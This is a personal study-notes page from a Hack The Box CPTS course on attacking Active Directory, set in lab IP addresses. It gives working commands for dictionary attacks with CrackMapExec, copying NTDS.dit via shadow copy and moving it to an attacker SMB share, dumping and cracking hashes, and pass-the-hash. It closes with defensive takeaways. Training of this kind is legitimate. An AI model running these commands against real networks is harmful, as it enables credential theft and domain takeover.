z3tssu
  • README
  • Cybersecurity Certifications & Notes
    • Cybersecurity Knowledge Base
      • IPPSEC's Video Search for Hacking Methods
      • Finding Someone's Location with Seeker
      • Nishang Project
      • Hacktricks Hacking Knowledge Base
      • PowerShell Techniques
        • Cool Techniques to get payload with Powershell
      • Download Files Remotely
    • πŸ“œCertifications & Courses
      • 🟒Hackthebox - CPTS
        • Getting Started
          • General
          • Tmux
          • Vim
          • Service Scanning
        • Penetration Testing Process
        • Network Enumeration with Nmap
          • Host Discovery
          • Host and Port Scanning
          • Saving the Nmap Scanning Results
          • Service Enumeration
          • Nmap Scripting Engine
            • Update the Scripting Engine
            • Nmap Script Locations
          • Performance Tags
          • Firewall and IDS/IPS Evasion
        • πŸ‘£Footprinting
          • πŸ”ŽHost-Based Service Enumeration
            • FTP [21]
              • Basics
                • vsFTPd Detailed Output
                • Hiding IDs - YES
              • Footprinting FTP
                • Nmap FTP Script Scanning
                • Service Interaction
              • FTP Commands
            • SMB [139/445]
              • Basics
                • Default Configuration
                • Create and Manage Samba Share
                • smbstatus
              • Footprinting SMB
                • SMB Nmap Scan
                • Smbclient
                • RPCclient
                  • Useful Commands
                  • Basic Enumeration
                  • Enumerate Users
                  • Group Information
                  • Bruteforcing User RIDs
                • smbmap
                • CrackMapExec
                • Enum4Linux-ng
            • NFS [111,2049]
              • Basics
                • Default Configuration of NFS
                • Creating an NFS Entry
                • Dangerous Settings
              • Footprinting NFS
                • nmap
                  • Basic Scan
                  • NFS Script Scan
                • Mount an NFS Share
                • Unmount NFS
            • DNS [53]
              • Basics
                • DNS Records
                • Default Configuration
                • Dangerous Settings
              • Footprinting DNS
                • DIG - NS QUERY
                • DIG - Version Query
                • DIG - Any Query
                • DIG - AXFR Zone Transfer
                • DIG - AXFR Zone Transfer - Internal
                • Subdomain Bruteforcing (For Loop with Seclists)
                • Subdomain Bruteforce (DNSenum)
            • SMTP (25,587)
              • Telnet SMTP
                • Telnet - HELO/EHLO
                • Telnet - VRFY
                • Telnet - Send an Email
              • Nmap Telnet
              • FTP User Enumeration
            • IMAP/POP3 [110,995,143,993]
              • Default Configuration
            • SNMP[161]
            • MySQL [3306]
            • MSSQL [1433]
            • Oracle TNS [1521]
            • IPMI [623]
            • SSH [22]
            • Rsync [873]
            • R-Services [512, 513, 514]
            • RDP [3389]
            • WinRM [5985, 5986]
            • WMI [135]
          • Introduction
            • Enumeration Principles
            • Enumeration Methodology
          • Infrastructure Enumeration
            • Domain Information
            • Cloud Resource
            • Staff
        • πŸ•ΈοΈWeb Information Gathering
          • πŸ€·β€β™‚οΈWHOIS
          • 🧬DNS
            • 🧬DIG
          • πŸ“šSubdomain Enumeration
            • DNS Zone Transfer
            • Sub Domain Bruteforcing
            • Virtual Hosts
              • Gobuster vhosts brutefoce
              • Add Vhosts to /etc/hosts
            • Certificate Transparency Logs
          • πŸ–οΈFingerprinting
            • Banner Grabbing
            • Web Application Firewall (Wafw00f)
            • Nikto
          • Crawling
            • robots.txt
            • .Well-Known URIs
            • Popular Web-Crawlers
              • Scrapy (ReconSpider)
              • Apache Nutch (Scalable Crawler)
              • Burp Suite Spider
              • OWASP ZAP (ZED Attack Proxy)
          • πŸ”₯Automating Recon
            • FinalRecon
          • πŸ”Search Engine Discovery
            • πŸ”Google Dorking
            • πŸ”Search Operators
          • Web Archives
          • Questions
            • Question 4
            • Question 5
        • Vulnerability Assessment
          • Vulnerability Scanning Tools
            • Nessus
              • Installing and Starting Nessus
              • Nessus Scan Types
              • Nessus Polices
                • Creating a Nessus Policy
              • Nessus Plugins
                • Creating a Plugin Rule
              • Credentialed Scanning
                • HTB Credentials for Nessus
              • Exporting Nessus Scans
              • Scanning Issues
            • OpenVAS
              • Installing OpenVAS
              • OpenVAS Scan
              • Exporting Scans
            • Nexpose
            • Qualys
          • Security Assessments
          • Vulnerability Assessment
          • Assessment Standards
          • Common Vulnerability Scoring System (CVSS)
          • Common Vulnerabilities and Exposures (CVE)
            • Open Vulnerability Assessment Language (OVAL)
          • Reporting
        • πŸ“‚File Transfers
          • File Transfer Methods
            • Windows File Transfer Methods
              • ⬇️Download Operations
                • πŸͺŸ PowerShell Base64 Encode & Decode
                • 🌐 PowerShell Web Downloads -
                • πŸ“¦ SMB Downloads
                • 🌐 FTP Downloads
              • ↗️Upload Operations
                • πŸ” Encode File Using PowerShell
                • 🌐 PowerShell Web Uploads
                • 🧬 PowerShell Base64 Web Upload
                • 🌐 SMB Uploads with WebDAV Twist
                • πŸ“‘ FTP Uploads
            • Linux File Transfer Methods
              • Download Operations
                • πŸ“¦ Base64 Encoding / Decoding for File Transfers
                • 🌐 Web Downloads with Wget and cURL
                • πŸ’£ Fileless Attacks in Linux – Execute Directly
                • 🐚 Download with Bash using /dev/tcp
                • πŸ” SSH Downloads with scp
                  • More Usage on SCP
              • Upload Operations
                • 🌐 Web Upload with HTTPS πŸš€
                • πŸ› οΈ Quick Web File Transfer Method
                • πŸ”„ SCP Upload
            • Transferring Files with Code
              • Downloading Files
              • Uploading Files
            • Transfer Files with Netcat, Ncat, RDP
            • Powershell Session File Transfer
            • RDP File Transfer
            • Protected File Transfers
            • Sending Files over HTTP/S
            • Upload and Download with Built in OS Tools
          • Detect or Be Detected
            • Detection
            • Evade Detection
        • 🐚Shells & Payloads
          • The Shell Basics
            • Bind Shell
            • Reverse Shell
          • Creating Payloads
            • Introduction to Payloads
            • Metasploit Payloads
            • Crafting Payloads with MSFvenom
          • Infiltrating Windows
            • πŸ› οΈ MS17-010 EternalBlue
          • Infiltrating Unix/Linux
            • 🐍 Spawning a TTY Shell with Python
            • Spawing Interactive Shells
          • Web Shells
            • πŸ§ͺ Laudanum – "One Web Shell to Rule Them All"
            • 🧠 Antak Webshell + ASPX Concepts
            • 🐘 PHP Web Shells
            • Shells & Payloads - The Live Engagement
          • Detection and Prevention
        • πŸ‘ΎMetasploit
          • Introduction
            • 🧰 Introduction to Metasploit Framework (MSF)
            • MSF Engagement Structure
          • MSF Components
            • 🧰 Modules
            • 🎯 Targets
            • 🧠 Payloads
            • πŸ”§ Encoders?
            • πŸ—„οΈ Database
            • πŸ”Œ Plugins
          • MSF Sessions
            • πŸ” Sessions
            • πŸ› οΈ Meterpreter
          • Additional Features
            • πŸ› οΈ Installing & Importing Custom Metasploit Modules
            • 🧠 Porting Scripts into Metasploit Modules
            • πŸ’₯ Introduction to MSFVenom
            • πŸ›‘οΈ Firewall and IDS/IPS Evasion
        • βš”οΈPassword Attacks
          • Where Credentials are Stored?
          • John The Ripper
          • Remote Password Attacks
            • πŸ–₯️ Network Services
              • WinRM [5985, 5986]
              • SSH [22]
              • RDP [3389]
              • SMB [139,445]
              • Questions
            • πŸ” Password Mutations & Wordlist Generation
            • πŸ” Password Reuse & Default Passwords
          • Windows Local Password Attacks
            • Attacking SAM (Security Account Manager)
            • Attacking LSASS
            • Attacking Active Directory & NTDS.dit
            • Credential Hunting in Windows
          • Linux Local Password Attacks
            • Credential Hunting in Linux
            • Passwd, Shadow & Opasswd in Linux
          • Windows Lateral Movement
            • Pass the Hash (PtH) Attack
            • Pass the Ticket from Windows
      • TCM Security - PNPT
      • Cisco Ethical Hacker
      • Introduction to Hacking Methodology
      • Microsoft Courses
    • Pentesting Services
    • Pentesting Web
      • CBBH
      • TCM Security - Practical Web Hacking
    • Pentesting Wi-Fi
      • OSWP
      • Wireless Penetration Test (WPA2)
    • Pentesting Cloud
    • Network Defense
      • Blue Team Level 1
    • 🐍Scripting with Python
    • ☒️Active Directory Penetration Testing
      • Initial Attack Vectors
      • Post Compromise Enumeration
    • Cybersecurity Job Skills
      • Information Security Officer Guide
    • πŸ”IP Address Investigation
      • WHOIS
      • Reverse DNS
      • Geolocation of the IP
      • Check If IP is Active and has Services Running
      • Check the IP Reputation
      • Check Passive DNS History
      • Confirm the Actual Server Location
    • Cybersecurity Projects
      • Wireless Penetration Test (WPA2)
      • AWS Honeypot
      • SOC Analyst Home Lab
      • Threat Management with Wazuh SIEM
    • Cybersecurity Book Notes
    • πŸ”„SOC Analyst
    • BUG BOUNTY
      • Books To Check Out
  • IT Certifications & Notes
    • Certifications
      • MS-900 Microsoft 365 Fundamentals
        • Describe Microsoft security and compliance capabilities
          • Describe the functions and identity types of Microsoft Entra ID
          • Describe access management capabilities of Microsoft Entra
            • Introduction
            • Describe Conditional Access
            • Describe Global Secure Access in Microsoft Entra
            • Describe Microsoft Entra roles and role-based access control (RBAC)
      • CISSP
      • ITIL
        • ITIL 4 Foundations
      • CCNA
        • David Bombal - Udemy
        • CCNA Training - Jeremy's IT Lab
          • Resources
          • Cisco Packet Tracer Labs
            • Cisco Packet Tracer Overview
            • Packet Tracer Lab 1
      • MCSE Certification Options
      • AZ-900
    • IT Projects & Training
      • Windows Server 2016 - Active Directory Lab Build
      • Windows Server 2022 Fundamentals
        • Introduction to Server Manager
          • Installing and Configuring Server Manager
          • Creating a VM on Microsoft Azure for Server 2022
        • Introduction to Active Directory
          • Active Directory and Setting up
          • Active Directory Overview
          • Delegation Rights for Active Directory
          • Active Directory Administrative Center
          • Common cmd commands for IT Support
        • Group Policy Management
          • How to apply basic GPO
        • Introduction to Share Folders
          • Creating Share Folders on Server Manager
          • Share Folder Permissions for Users
          • Map a Network Drive (locally)
          • Map a Network Drive through Active Directory
        • Understanding Windows/Common AD Issues
          • Installing RSAT Tools
          • Joining a PC to the Domain
        • Real Life IT Support Issues
          • When a User Gets locked out their accounts
          • Change Password of a User
      • Office 365 For IT Support
        • Office 365 Overview
      • Microsoft Azure Training
        • Getting Started in the Azure Portal
        • Introduction to Microsoft Azure Services
        • Basic Usage of Azure Services
        • Azure Deploy Sql Database Overview
        • Azure AD Connect Overview
        • Azure Microsoft File Share/Map Drives
        • Deploy Windows 11 to Azure
        • Microsoft Azure Basic Fundamentals (Azure Active Directory)
        • Introduction to Vnet (Overview)
        • Microsoft Azure Network/Security
        • Microsoft Azure Tagging (Final Course)
      • Networking Projects with Cisco Packet Tracer
        • Build a Basic Network
        • Webserver Project
      • Setup and Router and Switch
    • IT Knowledge Base
  • CTF/Box WRITEUPS
    • Tryhackme
    • HTB
      • Footprinting Lab - Easy
      • Footprinting Lab - Medium
      • Footprinting Lab - Hard
      • Nessus Skills Assessment
      • OpenVAS Skills Assessment
      • Tier 0
      • Tier 1
  • Cryptocurrency/Blockchain
    • Cryptocurrency Investigation
    • Certifications
      • Certified Blockchain Security Professional
Powered by GitBook
On this page
  • Understanding Windows Domain Authentication
  • Dictionary Attacks on AD Accounts
  • Generate of usernames.
  • Launching the Dictionary Attack
  • Event Logging of the Attack
  • Capturing NTDS.dit
  • Connecting to a DC with Evil-WinRM
  • Check User Privileges:
  • Creating a Shadow Copy of NTDS.dit
  • Quick Method: Dumping NTDS.dit with CrackMapExec
  • Cracking Hashes
  • Pass-the-Hash (PtH)
  • Defensive Takeaways
  1. Cybersecurity Certifications & Notes
  2. Certifications & Courses
  3. Hackthebox - CPTS
  4. Password Attacks
  5. Windows Local Password Attacks

Attacking Active Directory & NTDS.dit

Active Directory (AD) is critical in enterprise networks. If an organization uses Windows, AD is likely present, managing users and resources. This guide covers techniques for extracting credentials using dictionary attacks and dumping password hashes from the NTDS.dit file.


Understanding Windows Domain Authentication

Once a Windows system joins a domain:

  • It stops using the local SAM database for login.

  • All authentication requests go to the Domain Controller (DC).

  • Local logins are still possible using:

    • hostname\username

    • .\username (at login UI)

Key Authentication Components:

  • lsass.exe

  • NTLM & Kerberos protocols

  • Active Directory Domain Services


Dictionary Attacks on AD Accounts

A dictionary attack uses a list of common usernames and passwords to guess valid login credentials. While effective, it’s noisy and easily detected by security systems.

Tools Used:

  • CrackMapExec (CME)

Common Username Conventions:

Format
Example for Jane Jill Doe

firstinitiallastname

jdoe

firstnamelastname

janedoe

firstname.lastname

jane.doe

lastname.firstname

doe.jane

nickname

doedoehacksstuff

πŸ’‘ Tip: Use Google dorks like site:inlanefreight.com filetype:pdf to find usernames in document metadata.

Username List Example:

cat usernames.txt
bwilliamson
benwilliamson
ben.willamson
willamson.ben
...

Generate of usernames.

Use tools like Username Anarchy

./username-anarchy -i /home/ltnbob/names.txt 

Launching the Dictionary Attack

CrackMapExec:

crackmapexec smb 10.129.201.57 -u bwilliamson -p /usr/share/wordlists/fasttrack.txt
  • If a login is successful, CME will indicate it.

  • Failed attempts return STATUS_LOGON_FAILURE.

πŸ›‘ Beware of account lockout policies. Not always enabled by default.


Event Logging of the Attack

An IT admin can view the event of the attack in the event viewer

Event ID 4776 in Windows Event Viewer (Security Logs) will show:

  • Credential validation attempts

  • Details of success/failure


Capturing NTDS.dit

What is NTDS.dit?

  • Located at %SystemRoot%\NTDS\NTDS.dit

  • Contains all AD user accounts, password hashes, and schema info


Connecting to a DC with Evil-WinRM

evil-winrm -i 10.129.201.57 -u bwilliamson -p 'P@55w0rd!'

Check User Privileges:

net localgroup
net user bwilliamson
  • Ensure the user is in Administrators or Domain Admins group

  • We are looking to see if the account has local admin rights.

  • To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights. We also will want to check what domain privileges we have.


Creating a Shadow Copy of NTDS.dit

vssadmin CREATE SHADOW /For=C:

Copy the File:

We can then copy the NTDS.dit file from the volume shadow copy of C: onto another location on the drive to prepare to move NTDS.dit to our attack host.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\NTDS\NTDS.dit

Transfer to attacker’s machine using an SMB share.

  1. create an SMB share on our attack host

  2. Move or Copy the file to the attacker machine

move C:\NTDS\NTDS.dit \\10.10.15.30\CompData

Quick Method: Dumping NTDS.dit with CrackMapExec

crackmapexec smb 10.129.201.57 -u bwilliamson -p 'P@55w0rd!' --ntds
  • Dumps NTDS directly in terminal

  • Saves all retrieved hashes for further use


Cracking Hashes

Use Hashcat to crack NT hashes:

sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt

Output: 64f12cddaa88057e06a81b54e73b949b:Password1


Pass-the-Hash (PtH)

Even if hashes can't be cracked, use them for authentication by passing them around the network:

evil-winrm -i 10.129.201.57 -u Administrator -H "64f12cddaa88057e06a81b54e73b949b"

Useful for lateral movement within the network.


Defensive Takeaways

  • Monitor for Event ID 4776

  • Enforce account lockout policies

  • Harden access to NTDS.dit (limit admin privileges)

  • Regularly audit & monitor for VSS misuse

PreviousAttacking LSASSNextCredential Hunting in Windows

Last updated 1 month ago

πŸ“œ
🟒
βš”οΈ